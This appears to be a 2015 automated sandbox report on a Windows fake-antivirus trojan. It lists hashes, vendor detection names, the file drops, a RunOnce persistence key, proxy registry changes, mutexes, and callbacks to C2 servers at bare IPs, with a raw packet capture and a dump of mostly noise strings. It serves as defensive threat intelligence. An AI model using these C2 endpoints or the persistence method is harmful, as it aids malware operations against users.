Analysis Date: 2015-08-28 11:16:15
MD5: bfbb36406a628cbd3e009248b656a067
SHA1: 8e3a9f248ba1eb03648660982e5700450bae4cef

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text — md5: 0add59ff0fb9514f0be31325b96ed792 sha1: 281820c3bb6b9fb115a745306221b95bdad1c809 size: 201216
Section .rdata — md5: 1a56dbef144625aa741429f21e26a477 sha1: 9b8ebc3f1acb2d2f7e13180b0c3c53de5857be22 size: 2048
Section .data — md5: 6d337014ce8038d37b35fe0a2081aaed sha1: cdb79d7e281fcf8547528c0110642ede1244a51c size: 136704
Section .rsrc — md5: 77ac4b35b07939afc31ddf11ea62ff65 sha1: edfdaf7e11edbc35e55d80d4a7864ca38662ec28 size: 5120
Timestamp: 1970-01-14 04:01:40 (PE header compile time; a 1970 value is not a plausible build date and should be treated as zeroed or forged, not as provenance)
PEhash: 7747ded0fa850355a24fbc6b635377de18b56df8
IMPhash: 8aaaf4897d2db89e81da04378e9e697c
AV Rising: Trojan.FakeAV!49B1
AV McAfee: Generic FakeAlert.amb
AV Avira (antivir): TR/FakeAV.btxt.7
AV Twister: Trojan.AABC1F0A4405D8AC
AV Ad-Aware: Gen:Heur.Cridex.2
AV Alwil (avast): MalOb-FY [Cryp]
AV Eset (nod32): Win32/Kryptik.LYW
AV Grisoft (avg): FakeAlert.AAL
AV Symantec: Trojan.FakeAV!gen39
AV Fortinet: W32/FakeAlert.AMB!tr
AV BitDefender: Gen:Heur.Cridex.2
AV K7: Trojan ( 001e60c61 )
AV Microsoft Security Essentials: Rogue:Win32/Winwebsec
AV MicroWorld (escan): Gen:Heur.Cridex.2
AV MalwareBytes: Rogue.SystemTool
AV Authentium: W32/FakeAlert.LY.gen!Eldorado
AV Frisk (f-prot): W32/FakeAlert.LY.gen!Eldorado
AV Ikarus: Trojan.Win32.Pakes
AV Emsisoft: Gen:Heur.Cridex.2
AV Zillya!: Trojan.FakeAV.Win32.54223
AV Kaspersky: Trojan.Win32.Generic
AV Trend Micro: TROJ_FAKEAV.SMID
AV CAT (quickheal): FraudTool.Security
AV VirusBlokAda (vba32): Malware-Cryptor.Limpopo
AV Padvish: no_virus
AV BullGuard: Gen:Heur.Cridex.2
AV Arcabit (arcavir): Error Scanning File
AV ClamAV: Win.Trojan.Fakeav-6684
AV Dr. Web: Trojan.Fakealert.20511
AV F-Secure: Gen:Heur.Cridex.2
AV CA (E-Trust Ino): Win32/Diple.A!generic
Vendor consensus is rogue/fake antivirus software (FakeAV, FakeAlert, Rogue:Win32/Winwebsec, Rogue.SystemTool); the Gen:Heur.Cridex.2 entries are a shared BitDefender-engine heuristic name rather than independent attribution. Padvish reported no detection and Arcabit failed to scan the file, so neither result should be counted either way.

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\a3BAC.tmp
Creates File: C:\Documents and Settings\All Users\Application Data\jCgJdMcJcCi07003\jCgJdMcJcCi07003.exe  (self-copy into a machine-wide ProgramData path; the trailing 07003 in the directory name matches the affid=07003 parameter in the network requests below)
Creates File: C:\8e3a9f248ba1eb03648660982e5700450bae4cef  (file name is the sample's own SHA1)
Deletes File: C:\8e3a9f248ba1eb03648660982e5700450bae4cef  (created and removed within the same run)
Creates Process: "C:\Documents and Settings\Administrator\Local Settings\Temp\aE1CF.tmp"  (note: the launched .tmp name differs from the a3BAC.tmp logged as created above; its creation is not shown in this report)
Creates Process: "C:\Documents and Settings\All Users\Application Data\jCgJdMcJcCi07003\jCgJdMcJcCi07003.exe" "C:\malware.exe"  (the dropped copy is started with the original path as its argument)
Creates Mutex: Don't stop me! I need some money!  (usable as a host-based IOC)

Process
↳ "C:\Documents and Settings\All Users\Application Data\jCgJdMcJcCi07003\jCgJdMcJcCi07003.exe" "C:\malware.exe"

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Registry: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\jCgJdMcJcCi07003 ➝ C:\Documents and Settings\All Users\Application Data\jCgJdMcJcCi07003\jCgJdMcJcCi07003.exe\\x00  (per-user RunOnce persistence pointing at the dropped copy; the trailing \x00 is the logged NUL terminator of the value, not part of the path)
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint  (AFD is the Winsock kernel device; a socket was opened)
Creates File: C:\Documents and Settings\All Users\Application Data\jCgJdMcJcCi07003\jCgJdMcJcCi07003
Creates File: \Device\Afd\AsyncConnectHlp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: Don't stop me! I give work and money for you!  (usable as a host-based IOC)
Winsock DNS: 69.50.209.245  (IP literal; no hostname lookup is shown)
Winsock DNS: 69.50.195.76  (IP literal; no hostname lookup is shown)

Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\aE1CF.tmp"

Network Details:

HTTP GET: http://194.28.113.214/lurl.php?affid=07003
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; .NET CLR 1.1.4322)
HTTP POST: http://69.50.195.76/install.php?affid=07003
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; .NET CLR 1.1.4322)
HTTP GET: http://69.50.209.245/buy.php?affid=07003&data=7F136B16D32EBE585C4D3B61159ED3A2303230323032303200A6CB761B2FEBCD010004&h=1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://69.50.209.245/buy.php?affid=07003&data=7F136B16D32EBE585C4D3B61159ED3A2303230323032303200A6CB761B2FEBCD010004&h=2
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1031 ➝ 194.28.113.214:80
Flows TCP: 192.168.1.1:1031 ➝ 194.28.113.214:80
Flows TCP: 192.168.1.1:1032 ➝ 69.50.195.76:80
Flows TCP: 192.168.1.1:1034 ➝ 69.50.209.245:80
Flows TCP: 192.168.1.1:1035 ➝ 69.50.209.245:80
All three servers are addressed by bare IP (the Host headers in the raw capture are IPs too), so DNS-based detection will not see this traffic; block or alert on the IPs and on the affid=07003 / lurl.php / install.php / buy.php URL patterns instead. The lurl.php and install.php requests carry one fixed User-Agent while the two buy.php requests carry a different MSIE 6.0 string and, in the raw capture, browser-style Accept headers — they were probably not issued by the same code path (confirm against the pcap before treating the second UA as an indicator of this sample).

Raw Pcap
0x00000000 (00000)   47455420 2f6c7572 6c2e7068 703f6166   GET /lurl.php?af
0x00000010 (00016)   6669643d 30373030 33204854 54502f31   fid=07003 HTTP/1
0x00000020 (00032)   2e310d0a 52656665 7265723a 20687474   .1..Referer: htt
0x00000030 (00048)   703a2f2f 3139342e 32382e31 31332e32   p://194.28.113.2
0x00000040 (00064)   31340d0a 41636365 70743a20 2a2f2f2a   14..Accept: *//*
0x00000050 (00080)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x00000060 (00096)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x00000070 (00112)   7469626c 653b204d 53494520 372e303b   tible; MSIE 7.0;
0x00000080 (00128)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000090 (00144)   20475442 302e303b 202e4e45 5420434c    GTB0.0; .NET CL
0x000000a0 (00160)   5220312e 312e3433 3232290d 0a486f73   R 1.1.4322)..Hos
0x000000b0 (00176)   743a2031 39342e32 382e3131 332e3231   t: 194.28.113.21
0x000000c0 (00192)   340d0a43 6f6e6e65 6374696f 6e3a204b   4..Connection: K
0x000000d0 (00208)   6565702d 416c6976 650d0a43 61636865   eep-Alive..Cache
0x000000e0 (00224)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x000000f0 (00240)   68650d0a 0d0a                         he....

0x00000000 (00000)   504f5354 202f696e 7374616c 6c2e7068   POST /install.ph
0x00000010 (00016)   703f6166 6669643d 30373030 33204854   p?affid=07003 HT
0x00000020 (00032)   54502f31 2e310d0a 52656665 7265723a   TP/1.1..Referer:
0x00000030 (00048)   20687474 703a2f2f 36392e35 302e3139    http://69.50.19
0x00000040 (00064)   352e3736 0d0a4163 63657074 3a202a2f   5.76..Accept: */
0x00000050 (00080)   2f2a0d0a 436f6e74 656e742d 54797065   /*..Content-Type
0x00000060 (00096)   3a206170 706c6963 6174696f 6e2f782d   : application/x-
0x00000070 (00112)   7777772d 666f726d 2d75726c 656e636f   www-form-urlenco
0x00000080 (00128)   6465640d 0a557365 722d4167 656e743a   ded..User-Agent:
0x00000090 (00144)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x000000a0 (00160)   6d706174 69626c65 3b204d53 49452037   mpatible; MSIE 7
0x000000b0 (00176)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x000000c0 (00192)   2e313b20 47544230 2e303b20 2e4e4554   .1; GTB0.0; .NET
0x000000d0 (00208)   20434c52 20312e31 2e343332 32290d0a    CLR 1.1.4322)..
0x000000e0 (00224)   486f7374 3a203639 2e35302e 3139352e   Host: 69.50.195.
0x000000f0 (00240)   37360d0a 436f6e74 656e742d 4c656e67   76..Content-Leng
0x00000100 (00256)   74683a20 37340d0a 436f6e6e 65637469   th: 74..Connecti
0x00000110 (00272)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x00000120 (00288)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x00000130 (00304)   6f2d6361 6368650d 0a0d0a64 6174613d   o-cache....data=
0x00000140 (00320)   37463133 36423136 44333245 42453538   7F136B16D32EBE58
0x00000150 (00336)   35433444 33423631 31353945 44334132   5C4D3B61159ED3A2
0x00000160 (00352)   33303332 33303332 33303332 33303332   3032303230323032
0x00000170 (00368)   30304136 43423736 31423246 45424344   00A6CB761B2FEBCD
0x00000180 (00384)   30313034 31                           01041

0x00000000 (00000)   47455420 2f627579 2e706870 3f616666   GET /buy.php?aff
0x00000010 (00016)   69643d30 37303033 26646174 613d3746   id=07003&data=7F
0x00000020 (00032)   31333642 31364433 32454245 35383543   136B16D32EBE585C
0x00000030 (00048)   34443342 36313135 39454433 41323330   4D3B61159ED3A230
0x00000040 (00064)   33323330 33323330 33323330 33323030   3230323032303200
0x00000050 (00080)   41364342 37363142 32464542 43443031   A6CB761B2FEBCD01
0x00000060 (00096)   30303034 26683d31 20485454 502f312e   0004&h=1 HTTP/1.
0x00000070 (00112)   310d0a41 63636570 743a202a 2f2a0d0a   1..Accept: */*..
0x00000080 (00128)   41636365 70742d4c 616e6775 6167653a   Accept-Language:
0x00000090 (00144)   20656e2d 75730d0a 41636365 70742d45    en-us..Accept-E
0x000000a0 (00160)   6e636f64 696e673a 20677a69 702c2064   ncoding: gzip, d
0x000000b0 (00176)   65666c61 74650d0a 55736572 2d416765   eflate..User-Age
0x000000c0 (00192)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x000000d0 (00208)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x000000e0 (00224)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x000000f0 (00240)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x00000100 (00256)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x00000110 (00272)   0a486f73 743a2036 392e3530 2e323039   .Host: 69.50.209
0x00000120 (00288)   2e323435 0d0a436f 6e6e6563 74696f6e   .245..Connection
0x00000130 (00304)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x00000140 (00320)   37463133 36423136 44333245 42453538   7F136B16D32EBE58
0x00000150 (00336)   35433444 33423631 31353945 44334132   5C4D3B61159ED3A2
0x00000160 (00352)   33303332 33303332 33303332 33303332   3032303230323032
0x00000170 (00368)   30304136 43423736 31423246 45424344   00A6CB761B2FEBCD
0x00000180 (00384)   30313034 31                           01041

0x00000000 (00000)   47455420 2f627579 2e706870 3f616666   GET /buy.php?aff
0x00000010 (00016)   69643d30 37303033 26646174 613d3746   id=07003&data=7F
0x00000020 (00032)   31333642 31364433 32454245 35383543   136B16D32EBE585C
0x00000030 (00048)   34443342 36313135 39454433 41323330   4D3B61159ED3A230
0x00000040 (00064)   33323330 33323330 33323330 33323030   3230323032303200
0x00000050 (00080)   41364342 37363142 32464542 43443031   A6CB761B2FEBCD01
0x00000060 (00096)   30303034 26683d32 20485454 502f312e   0004&h=2 HTTP/1.
0x00000070 (00112)   310d0a41 63636570 743a2069 6d616765   1..Accept: image
0x00000080 (00128)   2f676966 2c20696d 6167652f 782d7862   /gif, image/x-xb
0x00000090 (00144)   69746d61 702c2069 6d616765 2f6a7065   itmap, image/jpe
0x000000a0 (00160)   672c2069 6d616765 2f706a70 65672c20   g, image/pjpeg, 
0x000000b0 (00176)   6170706c 69636174 696f6e2f 782d7368   application/x-sh
0x000000c0 (00192)   6f636b77 6176652d 666c6173 682c202a   ockwave-flash, *
0x000000d0 (00208)   2f2a0d0a 41636365 70742d4c 616e6775   /*..Accept-Langu
0x000000e0 (00224)   6167653a 20656e2d 75730d0a 41636365   age: en-us..Acce
0x000000f0 (00240)   70742d45 6e636f64 696e673a 20677a69   pt-Encoding: gzi
0x00000100 (00256)   702c2064 65666c61 74650d0a 55736572   p, deflate..User
0x00000110 (00272)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000120 (00288)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000130 (00304)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x00000140 (00320)   7773204e 5420352e 313b2053 56313b20   ws NT 5.1; SV1; 
0x00000150 (00336)   2e4e4554 20434c52 20322e30 2e353037   .NET CLR 2.0.507
0x00000160 (00352)   3237290d 0a486f73 743a2036 392e3530   27)..Host: 69.50
0x00000170 (00368)   2e323039 2e323435 0d0a436f 6e6e6563   .209.245..Connec
0x00000180 (00384)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x00000190 (00400)   0d0a0d0a                              ....


Strings
..-M
O
.
.
F
.
....
..
2.
^
q
K
.
.
.
V
]D...
.
.
zF
1001
File
Main
MS Sans Serif
=.+}};
{00B_<b'T
-00N4j
_09-D<9-
0B@EQHw
0cuO"|T
0G_3C]
0Mb6Ej
?0p{j!
=0)T9-
<0"u4q
1fj8NSM
1,}HLpn
;1iqdr
(1M"Ay
1q#(%|
1rdG_/
1t_xx;
1V4\TUr
1V\	'E
_1>vpO
2&4nY!
26e~#Se
2i]EjP
2_MvH%
,*2}o8
2RDV7?5
2?((xR
38KVSJw
3;Bs$K
}"3<cWno
3g@}Q~i
^3:]U@
\3U$wM
4Eiq';
)@4exgqm
4F,0&|	/
=4L`7O
4qE@(F
4~ZP5'Nr
5Cp1DL
5=d7D4
5F3#(|
5]i9Ug
5j&,1j
5O3I:p
5yD7%j
)5++yv
62ZOjBB
6.A0BM%
6a`46a#
"	6_E	P
?6es=+
6!gvjw
	6~Hf6
6I3NN]
6%`LKd
6LYo`F{
6Oxm8`
|6$Pvg
7ddbHh
7/g4\Z
"7'kn/
~7s(6;
}8-2.!K
8?Ae9?AE6?AE7?AE4?A
8iR0N3
8>javLu
+8V,i:
8Xt@	^
8#$.Zf
94Wm{ 
9dqI\P~]
9G%8^6=1
!9:	gG8x
9jdLqdO
9p^SYp.`
A4v/8G:z
a"	8R)F
*@{a9/
aBOm m
?Ae	?AE^
AE<(AE
;aEE5j
AEF*AE
AEI&AEZ
A"F75`u
aI{4KO2
AL;bfXM
	aMC"Q
aqt~5}yg-/_
Ar7&<(R
</assembly>
<assemblyIdentity
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
;A|VF>
aWnZc"y
'Ay5b*
A}zsNe^
::b0TD5
B3irlY&
B@ 4zJ
,	B7OR>
B9NHrF
b=[aGk
BaWAdb
@|(BbX
B@>Dn"0NNm
B(FC!w
:b]F&f
BitBlt
=BL~|24
BNVU?^
bP]~;`
C19<X_
'C1m'2^
c1q^M"
cAl^#+}Y
c_BG'u
ccYWf@
[Cdb~?
;Cd*ea
c FhO(v~
CharLowerA
CloseHandle
}@CL_Q-
c#oqA	w
C=p[P2
cPY(h0
CreateThread
c^zv%w
_?d>6#d>S
	d7'lL
*d>9I'^
Dafn*%
@.data
=<\dBBE
DClm66
DeleteCriticalSection
</dependency>
<dependency>
</dependentAssembly>
<dependentAssembly>
DFv&r5
:(-D{*gq=
,[DiqXPw
d	`'&j
=dJI<d
dJ#uWD
DJ,(V^
dMo7_!
DN&{Vma9
DnYj1Gb
D_oN!3
D;ROE-
dUEK&F
duJ1NV
DwHIii
D_W-P=
dY{OdF%
:?e2q>g
e@9r{ ~
-e(-`E
ef<T;e
`EHxJDha
e}J?:Az_o
</EK 6
E|kv.8
EM.Dyl
EnumSystemLocalesA
enYMea(
e>$OhIO
;e)Pv/
:E~QQf
e,QR.A
er39J}w+
et>9qF
e^T+?y8
EU^(h>:-
?:-eVz
:Ex*/&
ExitProcess
ExitThread
f1DXul%
faiM^BM
fd1&?iI
fFjQO>$
	\F^hu
fhy*fC_
FJHRFx
FlushFileBuffers
FlushInstructionCache
FmE:")
{&;foN
:FQAjGy
FreeEnvironmentStringsA
:FRV<za"4
*.@fTI%
f>+TX4C
fv.]AN
fV']fZw
$*F$,y
Fy|S.D6
'f.z4g%l
/G06C!
#G^4eN
g5krZC
Ga7t8W/
GaH0[5
*Gb!{!
(<gb3DfEE
g[CpD [e
GDI32.dll
,GDJ0E
.G<dvh
'GdZAkd
g>e"f*#
GetBkColor
GetBkMode
GetCommandLineA
GetConsoleCP
GetConsoleMode
GetConsoleOutputCP
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetEnvironmentStrings
GetFileType
GetKeyState
GetLastError
GetOEMCP
GetPixel
GetProcessHeap
GetProcessShutdownParameters
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetTimeZoneInformation
GetWindowLongW
gf~W@`
>GgQ]ia
Gh~zW*
G~^ikd
)gjS"h_E
g^l\d>%
glRP&7
|GPGdIiP
gq^	)B
g&R\d U
'Gr#}y{v*
GTWfX|
^G@;x]
`>gxTD
GzYb>%
h.38,I
:h8[cy
h^{9y/
HAq|aH
H[{BCU
HeapAlloc
HeapCreate
HeapFree
[HlXKc
h"Ng^(O*
h.Qdd8
HqYO8pW
hrpge:
ht0r.j
=^h;|+U
/hZCWnz
	i$!3 
i}9{Y^
*i}B5__&
iBAF&2
[IClN[
IF)pv=
I*~I'l
](IJuK
I&*\jUm#
ik49tG
[`ile6
ILpB0&/
In`2R/@O
InterlockedDecrement
InterlockedExchange
iq6bOi
Iq[r S
?I>{rr>H5d
&i.]sm
IsValidLocale
it}BmIIJ
Iv^:7:
i^}yk8d
j3RMvAd
j6m$KMFy
?{jA)AT
j!ay:w
J[D./_k*zi3JL^:
jFH9h]n
jhEht~
j|hF2Y
jHPR&j
J&i$Hw
JkFZW=!
JK )&j
	JLn`s,
j(ON9;
j"P8h#
jPf.*!
Jp%XvM
Jq<p?f
j!;s3p
&J^Tz`f
jvz^KW
Jx	q^g
K5k>\1
K5Y/9a
ka14cR
),K#b_
KbD;]s
k&&dA|
KERNEL32.dll
kff^ce/
kH/	1<
KjKddP
?KjVm)
kKr)DV
>+KL &
&K@S1j
kTW5B:
k":}}x+m
;kx<)r
kZy3]')
language="*"
LCMapStringA
LDLYJ"<
LeaveCriticalSection
L(eb,>l
Le:x>|
_L+"f _
LFhZ@G	
LI\bb#
ln6}SW
LocalAlloc
l.qfe43
lqj2w\
L(RO@7
lRU"3T
M7&\V.
m8:.Nk
(<M#'9
mBAWGB
MBW^}@
McpjRf
,!MD:S
*Me,WrC
mgKW#T
M)L>	Ye
m&Ng*&
MoJ46:ez
mouF*c
,`MRP;
MRrAt:
MSIMG32.dll
M'sM9q/M_
}#*mt7I
()Mv?4`a
MZ4S=1
n.1zn'9
N8a	(;~
name="Microsoft.Windows.Common-Controls"
.Nat.b
nAyi*)zl
nF@Hp/0
NGC/lP
nJK+.4
nN[/dqP
nqu^&Q
nro.I e
[NSPz2
nU]uB_
`^;nw 
nXFb=\
Nx`J\N
NxOv/<
O8D6{zj%
,Oar*q6
O@<!BB
OiK\MQZ
okEo9uH
o=KjJ2
o^@KVJ
oNJf;B
oop04N
osFGj!
O<]T#~
#Ov=5a
oVeJiu
	O}XN.
oZzn`!
p0Dr`2i
p'7hW%
<PBx};Y
PC@5~#
p:e~zpk
^pG=]Z7
&pKxT#
/plX/W
?PQ:SQ
PQvRk=@V[
processorArchitecture="*"/>
PTt.12D
publicKeyToken="6595b64144ccf1df"
pUqfcnH
P*walF
q2S7	`
^Q3FIQA1
Q5.]P7
!q_6Ei
Q7S(o{
q9194=,
q:gY|4!
.<QhIK
Qk*|G$
QM_roevU
*qN	^%
QQA4y#S
*Qq<=;n
Qr!6KW
{q~x)r
Qy"7bw
Q?.>Za
R0__9'=
.Ra5=9
`.rdata
@R]EC:
RF-&6#3;G
r,F-9x
}+~rH?
	r;hscX
Rhyv.A
Rich$-
RiMCft
rjVnyY^B|
RK>cqw=
/rnk|	
?RO=9</
R?Q],O}
rSjz/,
RtlUnwind
;R`toG
"r<W,_
RyH(w	
rZ3u::AlA
Rz67>1
&<};'s
s0~=H>
,SC+p.
s)dr,n
SelectObject
SetAbortProc
SetEndOfFile
SetEnvironmentVariableA
SetHandleCount
SetLastError
SetProcessShutdownParameters
SetStdHandle
SetTextCharacterExtra
siu#[B
s=NBvG-&
?S?Rsw
{{SS>0
StA]=~
sVKS9JU^
~:@t|{
T4D(2	Y
t$(B_d
Tb*|#j#
T>DNn2YF
Te~jKdcn*o5
!This program cannot be run in DOS mode.
thMi~N6&
tjfEQJV
tLqWB%
tn46gBu
tNA0K*+
TransparentBlt
:TR{oA,8
=tv1#"
tY1@2>
type="win32"
u>0SQa
u>0sX>$
U	1_}T
u.2Ci2|
u68Q#G8F
u6;`Vf
u.7B=D
u7N7EL
*|?$"ua@
u>$aM7
U*BN^f)+
uC2h	#
UCA	m~
uD*8Z@5
uD=O_"
u>e_:`\
U<ERrgU
u~F{~G
uf^QY`
ui9Thr
,UIO+&
UJc"dn
uJ)q~)
uKg?f2z
u@)N?{
un4eK!/
U:N74$
un*M*_
U]QgI.
USER32.dll
u~}sZ	
u>t(e.G-V
u.<UL8
u.u!}YM
u^<ViJ*
-UxS_A
v3#4@F
?v4f=pu)
V5iOjx
`V6*j^
v?Bq35
V_Cn6`
~|VdFD
version="6.0.0.0"
VF6q.5
V\;I;:
VirtualAlloc
VirtualFree
VirtualQueryEx
Vm\42G
vn{OQ/
vvIfBI
v-yRU&
v#]')z
:VzDzeD
w^3%joN
}W5oG9
wcTvOE
:	wd.9
Wg\V"U
]wi7+|
WNCuZ;
)W:"p]`
wQ?DrH
WriteConsoleA
w<T+OPw
wv1ET8R
!@wWpvVrj
x4TSe)4
xA<^:2
#XA6>'+
XcD[UM
XCVLn:
x EM]x
&X,f>y
xGLg+~
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
[>XNLf
?x.ojSg}
xS5);m
xSR)CI
XWfV"ye
XZGUY*F
y2;X>#
Y6C"m@z
yAs-}duq
Yft	4-
yQiy3X 
YuV*a5
"y]v6=
Y@V*S5
Z0j.)_+h}<
z1]WZHuQ
z2sm.s
|Z6Diz
`.z9a&
ZD!!%&=
Ze4+2y`
zE5Dpp
zFjzA'
Z!fp?]
Z=]>GU
ZKu~?]
ZQlq0u
`.ZwIh
zY5lQ5